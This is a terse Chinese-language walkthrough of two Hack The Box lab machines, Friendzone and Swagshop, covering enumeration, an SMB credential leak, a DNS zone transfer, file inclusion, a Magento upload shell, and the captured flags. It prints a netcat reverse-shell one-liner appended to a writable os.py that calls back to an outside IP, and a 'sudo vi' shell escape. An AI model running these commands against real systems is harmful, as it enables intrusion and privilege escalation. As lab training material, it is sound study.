HTB-oscplike-Friendzone+Swagshop
Friendzone
easy难度的friendzone 靶机IP 10.10.10.123
sudo nmap -sC -sV -p- --min-rate=5000 -Pn 10.10.10.123
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
80看了看有一行Email us at: info@friendzoneportal.red 不管 先看端口
nmap --script smb-enum-shares.nse -p445 10.10.10.123 可以把路径一起爆了
smbmap -H 10.10.10.123 扫到一个general可读 development可读可写
smbclient //10.10.10.123/general 发现general里面admin:WORKWORKHhallelujah@#
但是这串密码是干勾八的呢 这里的443端口有ssl-cert: Subject: commonName=friendzone.red
结合题目多半是zone transfer 那就 sudo dig axfr @10.10.10.123 friendzone.red
里面的域名全加进hosts里 然后访问https://administrator1.friendzone.red
这里要注意把自己的代理关了 我习惯性一直开着burp这里就访问不了了
然后拿smb里的密码登录里面有一个文件包含 配合我们可写的development拿下shell
拿到user的flag a9ed20acecd6c5b6b52f474e15ae9a11
然后pspy发现在执行reporter.py 这个文件导入了os 而linpeas下发现os.py是可写的
echo “system(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 7890 >/tmp/f’)” >> /usr/lib/python2.7/os.py
拿到root的flag b0e6c60b82cf96e9855ac1656a9e90c7
有一说一这个完全medium难度了 一点也不easy
Swagshop
easy难度的swagshop 靶机IP 10.10.10.140
sudo nmap -sC -sV -A -p- -Pn --min-rate=5000 10.10.10.140
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
dirsearch 在http://swagshop.htb/RELEASE_NOTES.txt下发现版本是1.7
80显示是magento 直接searchsploit 发现可以创造用户进入后台
进入后台后一个是有rce但是我这里python2搞得有点麻烦
另外一个可以在产品页面添加需要购买时上传一个文件 并且可以规定扩展名
后台设置好 前端上传shell 然后通过目录遍历漏洞用dirsearch扫出来的目录找到文件执行
拿到shell 拿到user的flag a448877277e82f05e5ddf9f90aefbac8
进去sudo -l发现可以用vi 看/var/www/html下的文件 那就直接vi -c 就行了
sudo vi /var/www/html/get.php -c ‘:!/bin/sh’ 拿到root的flag
c2b087d66e14a652a3b86a130ac56721